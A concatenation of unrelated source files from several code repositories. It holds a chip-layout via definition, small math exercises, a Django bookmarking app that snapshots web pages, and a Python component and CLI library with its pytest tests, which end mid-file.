# ------------------------------------- Virtual Modelling ----------------------------------------------
RDD.VIAS = ParameterDatabase()
# --- ViaI5 ---
RDD.VIAS.I5 = ParameterDatabase()
RDD.VIAS.I5.LAYER_STACK = {
'BOT_LAYER' : RDD.PLAYER.M5.METAL,
'TOP_LAYER' : RDD.PLAYER.M6.METAL,
'VIA_LAYER' : RDD.PLAYER.I5.VIA
}
RDD.PLAYER.I5.CLAYER_CONTACT = RDD.PLAYER.M5.METAL & RDD.PLAYER.M6.METAL & RDD.PLAYER.I5.VIA
RDD.PLAYER.I5.CLAYER_M1 = RDD.PLAYER.M5.METAL ^ RDD.PLAYER.I5.VIA
RDD.PLAYER.I5.CLAYER_M2 = RDD.PLAYER.M6.METAL ^ RDD.PLAYER.I5.VIA
class I5_PCELL_Database(LazyDatabase):
def initialize(self):
from ..devices.via import ViaI5
self.DEFAULT = ViaI5
RDD.VIAS.I5.PCELLS = I5_PCELL_Database()
# --- ViaC5RA ---
RDD.VIAS.C5R = ParameterDatabase()
RDD.VIAS.C5R.LAYER_STACK = {
'BOT_LAYER' : RDD.PLAYER.R5.METAL,
'TOP_LAYER' : RDD.PLAYER.M6.METAL,
'VIA_LAYER' : RDD.PLAYER.C5R.VIA
}
RDD.PLAYER.C5R.CLAYER_CONTACT = RDD.PLAYER.R5.METAL & RDD.PLAYER.M6.METAL & RDD.PLAYER.C5R.VIA
RDD.PLAYER.C5R.CLAYER_M1 = RDD.PLAYER.R5.METAL ^ RDD.PLAYER.C5R.VIA
RDD.PLAYER.C5R.CLAYER_M2 = RDD.PLAYER.M6.METAL ^ RDD.PLAYER.C5R.VIA
class C5R_PCELL_Database(LazyDatabase):
def initialize(self):
from ..devices.via import ViaC5RA, ViaC5RS
self.DEFAULT = ViaC5RA
self.STANDARD = ViaC5RS
RDD.VIAS.C5R.PCELLS = C5R_PCELL_Database()
# --- ViaJ5 ---
RDD.VIAS.J5 = ParameterDatabase()
RDD.VIAS.J5.LAYER_STACK = {
'BOT_LAYER' : RDD.PLAYER.M5.METAL,
'TOP_LAYER' : RDD.PLAYER.M6.METAL,
'VIA_LAYER' : RDD.PLAYER.J5.JUNCTION
}
RDD.PLAYER.J5.CLAYER_CONTACT = RDD.PLAYER.M5.METAL & RDD.PLAYER.M6.METAL & RDD.PLAYER.J5.JUNCTION
RDD.PLAYER.J5.CLAYER_M1 = RDD.PLAYER.M5.METAL ^ RDD.PLAYER.J5.JUNCTION
RDD.PLAYER.J5.CLAYER_M2 = RDD.PLAYER.M6.METAL ^ RDD.PLAYER.J5.JUNCTION
class J5_PCELL_Database(LazyDatabase):
def initialize(self):
from ..devices.via import JJ
self.DEFAULT = JJ
RDD.VIAS.J5.PCELLS = J5_PCELL_Database()
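# Reading the tables above, the export map resolves a physical layer to a GDSII
# (layer, datatype) pair, for example:
#   RDD.PLAYER.M5.METAL  -> layer 50, datatype 0    (PROCESS.M5, PURPOSE.METAL)
#   RDD.PLAYER.R5.ROUTE  -> layer 52, datatype 11   (PROCESS.R5, PURPOSE.ROUTE)
#   RDD.PLAYER.I5.VIA    -> layer 54, datatype 0    (PROCESS.I5, PURPOSE.VIA)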
``` |
{
"source": "JoeyDeRosa/code_katas",
"score": 4
} |
#### File: code_katas/Sum_Of_Nth_Terms/sum_of_nth_terms.py
```python
def series_sum(n):
    '''Return 1 + 1/4 + 1/7 + ... for n terms, as a string rounded to two decimal places.'''
if n == 0:
return '0.00'
acc = 0
div = -2
for i in range(n):
div += 3
acc += 1 / div
acc = str(round(acc, 2))
if len(acc) <= 3:
acc += '0'
return acc
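# Illustrative usage; the expected values follow from the series 1 + 1/4 + 1/7 + ...
if __name__ == '__main__':
    print(series_sum(0))  # '0.00'
    print(series_sum(1))  # '1.00'
    print(series_sum(2))  # '1.25'
    print(series_sum(5))  # '1.57'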
``` |
{
"source": "JoeyDeSmet/Algorithm-intro",
"score": 4
} |
#### File: Algorithm-intro/Exercises/Riemann.py
```python
import math
def f(x):
return math.pow(x, 2) + 3 * x + 15
def riemannIntegral(interval, a):
    """Approximate the integral of f over `interval` using `a` right-endpoint rectangles."""
    x = interval[0]
    step = (interval[1] - interval[0]) / a
    x1 = x + step
    integral = 0
    # one rectangle per subinterval; the original range(interval[0], a) only gave
    # the correct count when the interval started at 0
    for i in range(a):
        width = x1 - x
        height = f(x1)
        integral += width * height
        x = x1
        x1 = x + step
    return integral
print(riemannIntegral([0, 5], 5))
print(riemannIntegral([0, 5], 8))
print(riemannIntegral([0, 5], 1_000_000))
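# For reference, the exact value of the integral of x^2 + 3x + 15 over [0, 5] is
# 5**3/3 + 3*5**2/2 + 15*5 = 925/6 ≈ 154.1667; the approximations above converge
# to it as the number of rectangles grows:
print(925 / 6)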
``` |
{
"source": "joeydi/later-api",
"score": 2
} |
#### File: later-api/bookmarks/admin.py
```python
from django.contrib import admin
from django.contrib.admin import SimpleListFilter
from django.db.models import Count, Q
from .models import Bookmark, Snapshot
class SnapshotAdmin(admin.ModelAdmin):
readonly_fields = ['bookmark']
date_hierarchy = 'created_at'
list_display = [
'status_code',
'favicon',
'created_at',
]
admin.site.register(Snapshot, SnapshotAdmin)
class SnapshotInline(admin.StackedInline):
model = Snapshot
extra = 0
class StatusCodeFilter(SimpleListFilter):
title = 'status_code'
parameter_name = 'status_code'
def lookups(self, request, model_admin):
status_codes = Snapshot.objects.values_list(
'status_code', flat=True).order_by('status_code').distinct()
return [(code, code) for code in status_codes]
def queryset(self, request, queryset):
if self.value():
with_status_code = Count('snapshots', filter=Q(snapshots__status_code=self.value()))
queryset = queryset.annotate(status_code_count=with_status_code).filter(status_code_count__gt=0)
return queryset
class BookmarkAdmin(admin.ModelAdmin):
date_hierarchy = 'created_at'
list_display = [
'status_code',
'title',
'url',
'user',
'selection',
'folder',
'created_at',
]
list_filter = [
'folder',
StatusCodeFilter,
]
inlines = [
SnapshotInline
]
admin.site.register(Bookmark, BookmarkAdmin)
```
#### File: management/commands/save_snapshots.py
```python
import os
import csv
from pprint import pprint
from datetime import datetime
import pytz
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.db.models import Count
from django.contrib.auth.models import User
from bookmarks.models import Bookmark
class Command(BaseCommand):
help = "Saves Bookmark Snapshots from HTTP requests"
def add_arguments(self, parser):
parser.add_argument(
"-o", "--offset", type=int, help="Query Offset",
)
parser.add_argument(
"-l", "--limit", type=int, help="Query Limit",
)
def handle(self, *args, **kwargs):
offset = kwargs["offset"] if kwargs["offset"] else 0
limit = (kwargs["limit"] + offset) if kwargs["limit"] else (10 + offset)
bookmarks = Bookmark.objects.annotate(Count("snapshots")).filter(
snapshots__count=0
)[offset:limit]
for bookmark in bookmarks:
self.stdout.write(
self.style.SUCCESS(
'Saving Snapshot for Bookmark: "%s"' % bookmark.title
)
)
bookmark.save_snapshot()
```
#### File: later-api/bookmarks/models.py
```python
import json
import requests
from lxml import etree
from urllib.parse import urlparse
from dragnet import extract_content
from dragnet.blocks import BlockifyError
from django.db import models
from django.dispatch import receiver
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
from favicon.favicon import tags as favicon_tags
from .utils import TextRank4Keyword, LaterOpenGraph
class Bookmark(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="bookmarks")
url = models.URLField(max_length=2048)
title = models.CharField(blank=True, max_length=255)
selection = models.TextField(blank=True)
folder = models.CharField(blank=True, max_length=255, default="Unread")
tags = TaggableManager(blank=True)
@property
def status_code(self):
return self.snapshots.first().status_code if self.snapshots.exists() else None
@property
def domain(self):
return urlparse(self.url).hostname
@property
def description(self):
return (
self.snapshots.first().opengraph.get("description")
if self.snapshots.exists()
else None
)
@property
def favicon(self):
return self.snapshots.first().favicon if self.snapshots.exists() else None
def save_snapshot(self):
try:
r = requests.get(self.url)
except (
requests.exceptions.SSLError,
requests.exceptions.ConnectionError,
requests.exceptions.ReadTimeout,
) as e:
print(e)
return None
snapshot = {
"bookmark": self,
"content": r.text,
"headers_json": json.dumps(
{item[0]: item[1] for item in r.headers.items()}
),
"status_code": r.status_code,
}
try:
ogp = LaterOpenGraph(html=r.text)
snapshot["opengraph_json"] = ogp.to_json()
except AttributeError:
print("OpenGraph Error")
pass
try:
snapshot["parsed_content"] = extract_content(r.text)
except BlockifyError:
print("dragnet extract_content: BlockifyError")
snapshot["parsed_content"] = ""
pass
try:
tags = favicon_tags(self.url, r.text)
tags = sorted(tags, key=lambda i: i.width + i.height, reverse=True)
snapshot["favicon"] = tags[0].url
print(snapshot["favicon"])
except IndexError:
print("No Favicon Found")
pass
try:
tr4w = TextRank4Keyword()
tr4w.analyze(snapshot["parsed_content"])
keywords_weighted = tr4w.node_weight.items()
keywords_sorted = sorted(
keywords_weighted, key=lambda item: item[1], reverse=True
)
tags = [k.lower() for (k, v) in keywords_sorted if len(k) < 100][:9]
self.tags.add(*tags)
except MemoryError:
print("MemoryError while parsing keywords")
pass
# If the bookmark does not yet have a title, grab it from the document title
if not self.title:
try:
parser = etree.XMLParser(recover=True)
document = etree.fromstring(r.text, parser)
self.title = document.find(".//title").text
self.save()
except ValueError:
print("Error parsing document...")
pass
except AttributeError:
print("No title tag found...")
pass
# If we still don't have a title, grab it from the opengraph tags
if not self.title and ogp.get("title"):
self.title = ogp.get("title")
self.save()
return Snapshot.objects.create(**snapshot)
def __str__(self):
return self.title
class Meta:
ordering = ["-created_at"]
@receiver(models.signals.post_save, sender=Bookmark)
def execute_after_save(sender, instance, created, *args, **kwargs):
if created:
instance.save_snapshot()
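# Illustrative flow (assuming an existing Django user): creating a bookmark fires the
# post_save receiver above, which immediately fetches the URL and stores a Snapshot
# with the response, parsed content, favicon and keyword tags:
#   Bookmark.objects.create(user=some_user, url="https://example.com")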
class Snapshot(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
bookmark = models.ForeignKey(
Bookmark, on_delete=models.CASCADE, related_name="snapshots"
)
content = models.TextField(blank=True)
headers_json = models.TextField(blank=True)
parsed_content = models.TextField(blank=True)
status_code = models.IntegerField(blank=True)
opengraph_json = models.TextField(blank=True)
favicon = models.URLField(blank=True, max_length=2048)
@property
def headers(self):
return json.loads(self.headers_json)
@property
def opengraph(self):
return json.loads(self.opengraph_json) if self.opengraph_json else None
def __str__(self):
return self.bookmark.title
class Meta:
ordering = ["-created_at"]
``` |
{
"source": "JoeyDP/bacli",
"score": 3
} |
#### File: bacli/bacli/cli_legacy.py
```python
import atexit
import inspect
import argparse
functions = dict()
description = ""
def setDescription(desc):
global description
description = desc
# decorator for runnable functions
def command(f):
fName = f.__name__
if fName in functions:
print("Function {} already registered, overwriting it..")
functions[fName] = f
return f
def parse_args():
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(help="Select one of the following subcommands:", dest='command', metavar="subcommand")
subparsers.required = True
for fName, f in functions.items():
sub_parser = subparsers.add_parser(fName, help=f.__doc__, description=f.__doc__)
for param in inspect.signature(f).parameters.values():
tpe = param.annotation
if tpe is inspect.Parameter.empty:
tpe = str
if param.default is not inspect.Parameter.empty:
prefix = "-" if len(param.name) == 1 else "--"
sub_parser.add_argument(prefix + param.name,
help="type: {}, default={}".format(tpe.__name__, param.default),
type=tpe, default=param.default)
else:
sub_parser.add_argument(param.name, help="type: " + tpe.__name__,
type=tpe)
cmd_args = parser.parse_args()
fName = cmd_args.command
f = functions[fName]
args = cmd_args._get_args()
kwargs = {n: v for n, v in cmd_args._get_kwargs() if n != "command"}
f(*args, **kwargs)
def main():
try:
if len(functions) > 0:
parse_args()
except argparse.ArgumentError:
pass
except SystemExit:
pass
# if imported
if __name__ != "__main__":
atexit.register(main)
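# Hypothetical usage sketch (script and function names are examples only, and it is
# assumed the package re-exports `command` from this module): decorating a function
# exposes it as a subcommand whose annotated parameters become CLI arguments,
# positional when required and --flags when they have defaults. The commands run
# automatically at interpreter exit via the atexit hook above.
#
#   import bacli
#
#   @bacli.command
#   def greet(name: str, times: int = 1):
#       """Print a greeting."""
#       for _ in range(times):
#           print("Hello", name)
#
#   # `python script.py greet Alice --times 2` would call greet("Alice", times=2)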
``` |
{
"source": "JoeyDP/Components",
"score": 3
} |
#### File: Components/components/cli.py
```python
from abc import ABC, abstractmethod
import argparse
import inspect
from components import Component
class MyHelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
""" Custom help formatter for argparse. """
def _get_default_metavar_for_optional(self, action):
if action.type is None:
return ""
return action.type.__name__
def _get_default_metavar_for_positional(self, action):
if action.type is None:
return ""
return action.type.__name__
class CLI:
def __init__(self, description=""):
self.commands = dict()
self.parser = argparse.ArgumentParser(description=description)
self.subparsers = self.parser.add_subparsers(
help="Select one of the following subcommands:",
dest='command',
metavar="subcommand"
)
self.subparsers.required = True
def __call__(self):
self.run()
def run(self):
if len(self.commands) > 0:
self.setup()
cls, kwargs = self.parse_args()
obj = cls.resolve(**kwargs)
obj.run()
@property
def Command(self):
class Command(ABC):
""" Resolves parameters from command line arguments. """
def __init_subclass__(cls, **kwargs):
""" Hooks the subclass as a runnable command. """
super().__init_subclass__(**kwargs)
if not issubclass(cls, Component):
raise TypeError("cli.Command should only be used on Components")
self.commands[cls.__name__] = cls
@abstractmethod
def run(self):
pass
return Command
def setup(self):
for cls in self.commands.values():
self.setup_command(cls)
def setup_command(self, cls):
sub_parser = self.subparsers.add_parser(
cls.__name__,
help=cls.__doc__,
description=cls.__doc__,
formatter_class=MyHelpFormatter
)
def add_bool_param(parser, *names, dest, default):
"""
Add boolean parameter as two flags (--name/--no-name).
default indicates default value or None for a required boolean parameter.
"""
required = default is None
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument(*names, help="(default)" if default is True else "", dest=dest,
action='store_true')
# strip dashes and add '--no-'
no_names = [f"--no-{name[2 if name[:2] == '--' else 1:]}" for name in names]
group.add_argument(*no_names, help="(default)" if default is False else "",
dest=dest, action='store_false')
if default is not None:
group.set_defaults(**{dest: default})
def format_name(name):
param_name = name.replace('_', '-')
prefix = "-" if len(param_name) == 1 else "--"
return prefix + param_name
required_arguments = sub_parser.add_argument_group('required arguments')
for param in cls.get_requested_params(flatten=True):
required = param.default is inspect.Parameter.empty
names = [format_name(alias) for alias in sorted(param.aliases, key=len) if not (alias.startswith('_'))]
if required:
p = required_arguments
else:
p = sub_parser
if param.type == bool:
add_bool_param(p, *names, dest=param.full_name, default=None if required else param.default)
else:
conditional_kwargs = dict()
if not required:
conditional_kwargs['default'] = param.default
conditional_kwargs['help'] = "(default: %(default)s)"
p.add_argument(*names,
type=param.type,
dest=param.full_name,
required=required,
**conditional_kwargs)
def parse_args(self):
cmd_args = self.parser.parse_args()
fName = cmd_args.command
cls = self.commands[fName]
kwargs = {n: v for n, v in cmd_args._get_kwargs() if n != "command"}
return cls, kwargs
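# Hypothetical usage sketch (names are examples only): a Component subclass that also
# inherits from cli.Command is registered as a subcommand, and its requested parameters
# become CLI flags (booleans as --flag/--no-flag pairs):
#
#   cli = CLI("demo tool")
#
#   class Train(Component, cli.Command):
#       def __init__(self, epochs: int = 10, verbose: bool = False):
#           self.epochs = epochs
#           self.verbose = verbose
#       def run(self):
#           ...
#
#   cli.run()   # e.g. `python tool.py Train --epochs 5 --verbose`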
```
#### File: Components/components/param.py
```python
class Param(object):
def __init__(self, name, tpe, default, aliases=None):
# original name of the parameter
self.name = name
self.type = tpe
self.default = default
# aliases need to be unique within the component hierarchy. ComponentParam.enforce_consistency() checks this.
if aliases is None:
self.aliases = {self.name}
else:
self.aliases = set(aliases)
@property
def minimal_name(self):
""" Shortest name that still uniquely identifies the parameter. """
if len(self.aliases) == 0:
return self.name
return min(self.aliases, key=len)
@property
def full_name(self):
""" Fully defined name in component hierarchy. """
if len(self.aliases) == 0:
return self.name
return max(self.aliases, key=len)
def __repr__(self):
return f"Param: {self.full_name}"
def remove_invalid_aliases(self):
str_numbers = set(map(str, range(10)))
self.aliases = {alias for alias in self.aliases if not alias[0] in str_numbers}
def _remove_conflicting_aliases(self, name_map):
for alias in list(self.aliases):
if alias in name_map:
# name already defined
other_param = name_map[alias]
# use discard iso remove, because it may have already been deleted from the mapped param
other_param.aliases.discard(alias)
self.aliases.remove(alias)
# Note: do not remove param from name_map, because conflict can occur more than 2 times
else:
name_map[alias] = self
def check_valid(self):
""" Check if parameter still has at least one name. """
if len(self.aliases) == 0:
raise AttributeError(f"No valid identifier for parameter {self.name}")
def flatten(self):
""" Return flattened version of params, without components. """
return [self]
class ComponentParam(Param):
def __init__(self, name, tpe, default, params=None, aliases=None):
super().__init__(name, tpe, default, aliases=aliases)
if params is None:
self.params = list()
else:
self.params = params
def __repr__(self):
return f"ComponentParam: {self.full_name}"
def enforce_consistency(self):
# 1. remove aliases that aren't valid identifiers.
self.remove_invalid_aliases()
# 2. remove all shadowed variable names
self.remove_shadowed_aliases()
# 3. resolve all conflicting names
self.remove_conflicting_aliases()
# 4. if param without valid identifier, raise error
self.check_valid()
def remove_invalid_aliases(self):
""" Remove aliases that aren't valid identifiers. """
super().remove_invalid_aliases()
for param in self.params:
param.remove_invalid_aliases()
def remove_shadowed_aliases(self):
"""
Remove all variable names that conflict with a parent name.
Uses depth first traversal to remove parent names from children.
"""
self._remove_shadowed_aliases(set())
def _remove_shadowed_aliases(self, defined):
all_param_names = self.aliases.copy()
for param in self.params:
all_param_names |= param.aliases
for param in self.params:
param.aliases -= defined # prune aliases as well
if isinstance(param, ComponentParam):
param._remove_shadowed_aliases(defined | all_param_names)
def remove_conflicting_aliases(self):
"""
Remove all names that occur multiple times, without a parent-child relation.
Uses in-order traversal with map from names to components to detect conflicts.
"""
name_map = dict()
self._remove_conflicting_aliases(name_map)
def _remove_conflicting_aliases(self, name_map):
super()._remove_conflicting_aliases(name_map)
for param in self.params:
param._remove_conflicting_aliases(name_map)
def check_valid(self):
""" Check if every parameter still has at least one name. """
super().check_valid()
for param in self.params:
param.check_valid()
def flatten(self):
""" Return flattened version of params, without components. """
return sum(map(lambda x: x.flatten(), self.params), [])
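# Illustrative example (inferred from the naming convention in the tests below, not
# part of the original module): a parameter "key" owned by a sub-component bound to
# the name "sub" typically carries the alias set {"key", "sub_key"}; minimal_name
# then returns the shortest alias ("key") and full_name the longest one ("sub_key").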
```
#### File: components/test/test_component.py
```python
import pytest
from components import Component
def test_resolve_component():
class Comp(Component):
def __init__(self, a, b=3):
self.a = a
self.b = b
c = Comp.resolve(a=4)
assert c.get_params() == {'a': 4, 'b': 3}
assert c.a == 4 and c.b == 3
c = Comp.resolve(a=4, b=5)
assert c.get_params() == {'a': 4, 'b': 5}
assert c.a == 4 and c.b == 5
with pytest.raises(TypeError):
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.raises(TypeError):
with pytest.warns(RuntimeWarning):
Comp.resolve(b=5)
with pytest.raises(TypeError):
with pytest.warns(RuntimeWarning):
Comp.resolve(other_param=3)
def test_attribute_override_default():
class Comp(Component):
key = 3
def __init__(self, key=5):
self.key = key
# Use `resolve` to check attributes
c = Comp.resolve()
assert c.get_params() == {'key': 3}
assert c.key == 3
c = Comp.resolve(key=9)
assert c.get_params() == {'key': 9}
assert c.key == 9
# Normal object creation ignores attribute override for parameter 'key'
c = Comp()
assert c.get_params() == {'key': 5}
assert c.key == 5
c = Comp(key=7)
assert c.get_params() == {'key': 7}
assert c.key == 7
def test_resolve_subcomponent():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
c = Comp.resolve(sub_key=42)
assert c.get_params()['sub'].get_params() == {'key': 42}
assert c.sub.key == 42
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 5}
assert c.sub.key == 5
c = Comp.resolve(sub=SubComp(8))
assert c.get_params()['sub'].get_params() == {'key': 8}
assert c.sub.key == 8
with pytest.warns(RuntimeWarning):
c = Comp.resolve(sub=3)
assert c.sub == 3
with pytest.raises(TypeError):
Comp.resolve(par1=42)
with pytest.raises(TypeError):
Comp.resolve(sub=SubComp(8), key=5)
def test_resolve_subcomponent_conflicting_params():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp, key=3):
self.sub = sub
self.key = key
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['key'] == 3 and c.get_params()['sub'].get_params() == {'key': 5}
assert c.key == 3 and c.sub.key == 5
c = Comp.resolve(key=42)
assert c.get_params()['key'] == 42 and c.get_params()['sub'].get_params() == {'key': 5}
assert c.key == 42 and c.sub.key == 5
c = Comp.resolve(sub_key=8)
assert c.get_params()['key'] == 3 and c.get_params()['sub'].get_params() == {'key': 8}
assert c.key == 3 and c.sub.key == 8
c = Comp.resolve(key=10, sub_key=1)
assert c.get_params()['key'] == 10 and c.get_params()['sub'].get_params() == {'key': 1}
assert c.key == 10 and c.sub.key == 1
def test_subcomponent_shadowed_param():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp, key=3):
self.sub = sub
self.key = key
class OtherComp(Component):
sub: Comp
def __init__(self, sub: Comp):
self.sub = sub
c = OtherComp.resolve()
assert type(c.sub) == Comp
assert type(c.sub.sub) == SubComp
with pytest.warns(RuntimeWarning):
c = OtherComp.resolve(sub=None)
assert (c.sub is None)
def test_resolve_conflicting_subcomponent_params():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub1: SubComp, sub2: SubComp):
self.sub1 = sub1
self.sub2 = sub2
with pytest.raises(TypeError):
Comp.resolve(key=42)
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['sub1'].get_params() == {'key': 5} and c.get_params()['sub2'].get_params() == {'key': 5}
assert c.sub1.key == 5 and c.sub2.key == 5
c = Comp.resolve(sub1_key=3)
assert c.get_params()['sub1'].get_params() == {'key': 3} and c.get_params()['sub2'].get_params() == {'key': 5}
assert c.sub1.key == 3 and c.sub2.key == 5
c = Comp.resolve(sub2_key=8)
assert c.get_params()['sub1'].get_params() == {'key': 5} and c.get_params()['sub2'].get_params() == {'key': 8}
assert c.sub1.key == 5 and c.sub2.key == 8
c = Comp.resolve(sub1_key=9, sub2_key=42)
assert c.get_params()['sub1'].get_params() == {'key': 9} and c.get_params()['sub2'].get_params() == {'key': 42}
assert c.sub1.key == 9 and c.sub2.key == 42
def test_subcomponent_type_mismatch_warn():
class SubComp(Component):
def __init__(self, key: str = 5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.warns(RuntimeWarning):
Comp.resolve(key=20)
with pytest.warns(None) as r:
Comp.resolve(key="20")
assert len(r) == 0
def test_subcomponent_type_mismatch_no_warn():
class SubComp(Component):
def __init__(self, key: float = 5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(None) as r:
Comp.resolve()
Comp.resolve(key=20)
assert len(r) == 0
with pytest.warns(RuntimeWarning):
Comp.resolve(key="20")
with pytest.warns(RuntimeWarning):
Comp.resolve(sub=None)
class Comp2(Component):
def __init__(self, sub: SubComp = None):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(sub=None)
with pytest.warns(None) as r:
Comp2.resolve()
assert len(r) == 0
def test_subcomponent_change_type_mismatch_warn():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
key: str
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.warns(RuntimeWarning):
Comp.resolve(key=20)
def test_subcomponent_change_type_mismatch_warn2():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
sub_key: str
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.warns(RuntimeWarning):
Comp.resolve()
with pytest.warns(RuntimeWarning):
Comp.resolve(key=20)
def test_subcomponent_conflicting_param_type_are_conflicts_removed():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
# type should not be changed because of conflicting names
key: str
def __init__(self, sub1: SubComp, sub2: SubComp):
self.sub1 = sub1
self.sub2 = sub2
# Capture warning
with pytest.warns(None) as record:
Comp.resolve()
Comp.resolve(sub1_key=20)
Comp.resolve(sub2_key=30)
for warning in record:
assert False, f"Warning should not have been given: {warning}"
assert len(record) == 0, "No warning should be given."
def test_subcomponent_conflicting_param_type_shadow_handled_1():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
# type of subcomp key should not be changed because of conflicting names and parent
key: str
def __init__(self, sub1: SubComp, sub2: SubComp, key: int):
self.key = key
self.sub1 = sub1
self.sub2 = sub2
with pytest.warns(RuntimeWarning):
Comp.resolve(key=123)
with pytest.warns(RuntimeWarning):
Comp.resolve(key="123", sub1_key="456")
with pytest.warns(RuntimeWarning):
Comp.resolve(key="123", sub1_key="13")
# Capture warning
with pytest.warns(None) as record:
Comp.resolve(key="123")
Comp.resolve(key="123", sub1_key=20)
Comp.resolve(key="123", sub2_key=30)
for warning in record:
assert False, f"Warning should not have been given: {warning}"
assert len(record) == 0, "No warning should be given."
def test_subcomponent_conflicting_param_type_shadow_handled_2():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
# type of subcomp key should not be changed because of conflicting names and parent
key: str
def __init__(self, sub: SubComp, key: int):
self.key = key
self.sub1 = sub
with pytest.warns(RuntimeWarning):
Comp.resolve(key=123)
with pytest.warns(RuntimeWarning):
Comp.resolve(key="123", sub_key="456")
# Capture warning
with pytest.warns(None) as record:
Comp.resolve(key="123")
Comp.resolve(key="123", sub_key=20)
for warning in record:
assert False, f"Warning should not have been given: {warning}"
assert len(record) == 0, "No warning should be given."
def test_resolve_conflicting_params():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp, key=4):
self.sub = sub
self.key = key
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 5} and c.get_params()['key'] == 4
assert c.sub.key == 5 and c.key == 4
c = Comp.resolve(sub_key=3)
assert c.get_params()['sub'].get_params() == {'key': 3} and c.get_params()['key'] == 4
assert c.sub.key == 3 and c.key == 4
c = Comp.resolve(key=8)
assert c.get_params()['sub'].get_params() == {'key': 5} and c.get_params()['key'] == 8
assert c.sub.key == 5 and c.key == 8
c = Comp.resolve(sub_key=9, key=42)
assert c.get_params()['sub'].get_params() == {'key': 9} and c.get_params()['key'] == 42
assert c.sub.key == 9 and c.key == 42
def test_resolve_conflicting_subcomponent_params_2():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub1: SubComp, sub2: SubComp, key=42):
self.sub1 = sub1
self.sub2 = sub2
self.key = key
with pytest.raises(TypeError):
Comp.resolve(other_key=42)
c = Comp.resolve()
assert c.get_params()['sub1'].get_params() == {'key': 5} and c.get_params()['sub2'].get_params() == {'key': 5} and \
c.get_params()['key'] == 42
assert c.sub1.key == 5 and c.sub2.key == 5 and c.key == 42
c = Comp.resolve(sub1_key=9, sub2_key=12, key=3)
assert c.get_params()['sub1'].get_params() == {'key': 9} and c.get_params()['sub2'].get_params() == {'key': 12} and \
c.get_params()['key'] == 3
assert c.sub1.key == 9 and c.sub2.key == 12 and c.key == 3
def test_attribute_override_from_owner():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
key = 3
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
assert type(c.sub) == SubComp
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 3}
assert c.sub.key == 3
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
def test_attribute_override_conflict():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
key = 3
sub_key = 9
def __init__(self, sub: SubComp):
self.sub = sub
with pytest.raises(TypeError):
Comp.resolve(key=4)
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
with pytest.raises(TypeError):
Comp.resolve()
def test_param_provide_conflict():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
assert type(c.sub) == SubComp
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
with pytest.raises(TypeError):
Comp.resolve(key=3, sub_key=8)
def test_attribute_override_from_owner_full_name():
class SubComp(Component):
def __init__(self, key=5):
self.key = key
class Comp(Component):
sub_key = 3
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
assert type(c.sub) == SubComp
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 3}
assert c.sub.key == 3
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
def test_attribute_override_with_owner():
class SubComp(Component):
key = 3
def __init__(self, key=5):
self.key = key
class Comp(Component):
def __init__(self, sub: SubComp):
self.sub = sub
c = Comp.resolve(key=4)
assert c.get_params()['sub'].get_params() == {'key': 4}
assert c.sub.key == 4
c = Comp.resolve()
assert c.get_params()['sub'].get_params() == {'key': 3}
assert c.sub.key == 3
c = SubComp()
assert c.get_params() == {'key': 5}
assert c.key == 5
c = SubComp.resolve()
assert c.get_params() == {'key': 3}
assert c.key == 3
def test_attribute_override_both():
class SubComp(Component):
key = 3
def __init__(self, key=5):
